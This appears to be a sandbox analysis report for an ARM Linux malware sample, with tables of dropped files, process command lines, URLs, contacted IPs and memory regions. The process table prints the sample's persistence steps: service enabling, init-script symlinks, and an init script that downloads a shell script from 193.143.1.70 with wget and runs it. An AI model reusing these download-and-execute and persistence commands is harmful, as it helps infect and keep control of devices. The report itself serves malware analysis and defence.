Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
arm7.nn.elf
|
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
|
initial sample
|
 |
|
|
/etc/init.d/arm7.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/mybinary
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.73RtP3 (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/arm7.nn.elf
|
/tmp/arm7.nn.elf
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/mybinary
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm7.nn.elf'\n
/tmp/arm7.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n
echo 'Stopping arm7.nn.elf'\n killall arm7.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo
\\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm7.nn.elf"
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "chmod +x /etc/init.d/arm7.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/arm7.nn.elf
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 38 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
34.145.142.248
|
unknown
|
United States
|
||
|
101.55.69.30
|
unknown
|
Korea Republic of
|
||
|
146.119.187.200
|
unknown
|
Finland
|
||
|
186.247.210.229
|
unknown
|
Brazil
|
||
|
81.177.147.240
|
unknown
|
Russian Federation
|
||
|
15.5.114.16
|
unknown
|
United States
|
||
|
115.6.116.144
|
unknown
|
Korea Republic of
|
||
|
209.165.122.219
|
unknown
|
United States
|
||
|
11.71.87.181
|
unknown
|
United States
|
||
|
183.215.48.195
|
unknown
|
China
|
||
|
58.105.1.236
|
unknown
|
Australia
|
||
|
209.118.248.13
|
unknown
|
United States
|
||
|
111.177.215.247
|
unknown
|
China
|
||
|
186.55.5.41
|
unknown
|
Uruguay
|
||
|
196.16.28.128
|
unknown
|
Seychelles
|
||
|
9.206.48.138
|
unknown
|
United States
|
||
|
78.154.56.44
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
198.68.128.221
|
unknown
|
United States
|
||
|
174.187.19.120
|
unknown
|
United States
|
||
|
42.234.38.180
|
unknown
|
China
|
||
|
215.96.12.192
|
unknown
|
United States
|
||
|
116.134.44.77
|
unknown
|
China
|
||
|
27.227.211.119
|
unknown
|
China
|
||
|
69.165.21.236
|
unknown
|
United States
|
||
|
51.93.104.49
|
unknown
|
United States
|
||
|
123.243.74.227
|
unknown
|
Australia
|
||
|
107.148.199.21
|
unknown
|
United States
|
||
|
106.39.180.42
|
unknown
|
China
|
||
|
132.159.97.91
|
unknown
|
United States
|
||
|
75.118.74.155
|
unknown
|
United States
|
||
|
200.42.6.33
|
unknown
|
Argentina
|
||
|
52.66.145.113
|
unknown
|
United States
|
||
|
2.126.11.101
|
unknown
|
United Kingdom
|
||
|
153.178.5.72
|
unknown
|
Japan
|
||
|
36.109.80.36
|
unknown
|
China
|
||
|
166.254.235.231
|
unknown
|
United States
|
||
|
89.255.57.126
|
unknown
|
Netherlands
|
||
|
122.72.198.169
|
unknown
|
China
|
||
|
214.247.135.23
|
unknown
|
United States
|
||
|
138.198.23.102
|
unknown
|
United Kingdom
|
||
|
79.174.164.3
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
56.47.218.142
|
unknown
|
United States
|
||
|
82.130.11.248
|
unknown
|
Finland
|
||
|
142.93.208.241
|
unknown
|
United States
|
||
|
132.204.155.234
|
unknown
|
Canada
|
||
|
32.201.157.49
|
unknown
|
United States
|
||
|
47.105.233.193
|
unknown
|
China
|
||
|
189.174.177.34
|
unknown
|
Mexico
|
||
|
62.5.178.101
|
unknown
|
Russian Federation
|
||
|
197.59.205.73
|
unknown
|
Egypt
|
||
|
123.149.135.66
|
unknown
|
China
|
||
|
199.69.184.113
|
unknown
|
United States
|
||
|
44.227.137.234
|
unknown
|
United States
|
||
|
28.132.206.72
|
unknown
|
United States
|
||
|
156.18.197.14
|
unknown
|
France
|
||
|
73.124.164.53
|
unknown
|
United States
|
||
|
16.58.194.96
|
unknown
|
United States
|
||
|
70.163.59.142
|
unknown
|
United States
|
||
|
113.189.154.205
|
unknown
|
Viet Nam
|
||
|
6.58.255.89
|
unknown
|
United States
|
||
|
107.46.21.173
|
unknown
|
United States
|
||
|
163.69.71.16
|
unknown
|
France
|
||
|
142.226.2.46
|
unknown
|
Canada
|
||
|
87.206.140.50
|
unknown
|
Poland
|
||
|
102.60.106.105
|
unknown
|
Egypt
|
||
|
30.12.130.19
|
unknown
|
United States
|
||
|
84.27.247.134
|
unknown
|
Netherlands
|
||
|
142.60.216.204
|
unknown
|
Canada
|
||
|
188.219.57.6
|
unknown
|
Italy
|
||
|
221.82.134.179
|
unknown
|
Japan
|
||
|
122.211.57.200
|
unknown
|
Japan
|
||
|
158.151.112.202
|
unknown
|
United States
|
||
|
65.117.31.107
|
unknown
|
United States
|
||
|
107.96.78.255
|
unknown
|
United States
|
||
|
142.82.122.167
|
unknown
|
Canada
|
||
|
132.95.160.115
|
unknown
|
United States
|
||
|
110.86.106.75
|
unknown
|
China
|
||
|
193.143.1.59
|
unknown
|
unknown
|
||
|
89.46.84.159
|
unknown
|
Sweden
|
||
|
161.89.79.5
|
unknown
|
Netherlands
|
||
|
76.181.21.242
|
unknown
|
United States
|
||
|
58.105.102.238
|
unknown
|
Australia
|
||
|
204.139.34.229
|
unknown
|
United States
|
||
|
109.214.201.158
|
unknown
|
France
|
||
|
183.158.220.51
|
unknown
|
China
|
||
|
216.112.217.110
|
unknown
|
United States
|
||
|
13.133.37.240
|
unknown
|
United States
|
||
|
11.129.85.23
|
unknown
|
United States
|
||
|
109.210.252.146
|
unknown
|
France
|
||
|
7.57.233.50
|
unknown
|
United States
|
||
|
57.214.207.171
|
unknown
|
Belgium
|
||
|
30.42.156.166
|
unknown
|
United States
|
||
|
137.65.103.225
|
unknown
|
United States
|
||
|
149.130.12.184
|
unknown
|
United States
|
||
|
144.199.177.243
|
unknown
|
Malaysia
|
||
|
208.218.68.19
|
unknown
|
United States
|
||
|
60.211.91.61
|
unknown
|
China
|
||
|
105.30.112.2
|
unknown
|
Mauritius
|
||
|
56.97.178.69
|
unknown
|
United States
|
||
|
149.104.34.105
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f9bcc036000
|
page execute read
|
|
||
|
7f9bcc036000
|
page execute read
|
|
||
|
7f9cd2764000
|
page read and write
|
|||
|
7f9cd2582000
|
page read and write
|
|||
|
7f9cd2945000
|
page read and write
|
|||
|
7f9bcc043000
|
page read and write
|
|||
|
7f9cd2a92000
|
page read and write
|
|||
|
558e84612000
|
page execute and read and write
|
|||
|
558e85db1000
|
page read and write
|
|||
|
7ffc33913000
|
page read and write
|
|||
|
558e82614000
|
page read and write
|
|||
|
558e82614000
|
page read and write
|
|||
|
7f9cd2a6e000
|
page read and write
|
|||
|
7f9cd1d94000
|
page read and write
|
|||
|
7f9cd2a92000
|
page read and write
|
|||
|
7f9cd2ad7000
|
page read and write
|
|||
|
7f9ccc021000
|
page read and write
|
|||
|
7f9cd2ad7000
|
page read and write
|
|||
|
558e8260b000
|
page read and write
|
|||
|
7f9cd23f3000
|
page read and write
|
|||
|
7f9ccbfff000
|
page read and write
|
|||
|
7f9cd158c000
|
page read and write
|
|||
|
7f9cd158c000
|
page read and write
|
|||
|
558e823ba000
|
page execute read
|
|||
|
7f9bcc043000
|
page read and write
|
|||
|
7ffc3397e000
|
page execute read
|
|||
|
7f9cd2416000
|
page read and write
|
|||
|
7f9ccc021000
|
page read and write
|
|||
|
7f9cd23f3000
|
page read and write
|
|||
|
7f9cd2188000
|
page read and write
|
|||
|
7ffc33913000
|
page read and write
|
|||
|
7f9cd1d94000
|
page read and write
|
|||
|
7f9cd1e26000
|
page read and write
|
|||
|
7f9cd2188000
|
page read and write
|
|||
|
7f9bcc03e000
|
page read and write
|
|||
|
7f9cd2764000
|
page read and write
|
|||
|
558e823ba000
|
page execute read
|
|||
|
7f9cd1e26000
|
page read and write
|
|||
|
7f9cd2416000
|
page read and write
|
|||
|
7ffc3397e000
|
page execute read
|
|||
|
7f9bcc03e000
|
page read and write
|
|||
|
558e84629000
|
page read and write
|
|||
|
7f9cd2582000
|
page read and write
|
|||
|
558e8260b000
|
page read and write
|
|||
|
7f9cd2945000
|
page read and write
|
|||
|
7f9bcc049000
|
page read and write
|
|||
|
7f9cd2a6e000
|
page read and write
|
|||
|
558e85db1000
|
page read and write
|
|||
|
7f9ccbfff000
|
page read and write
|
|||
|
558e84612000
|
page execute and read and write
|
|||
|
558e84629000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.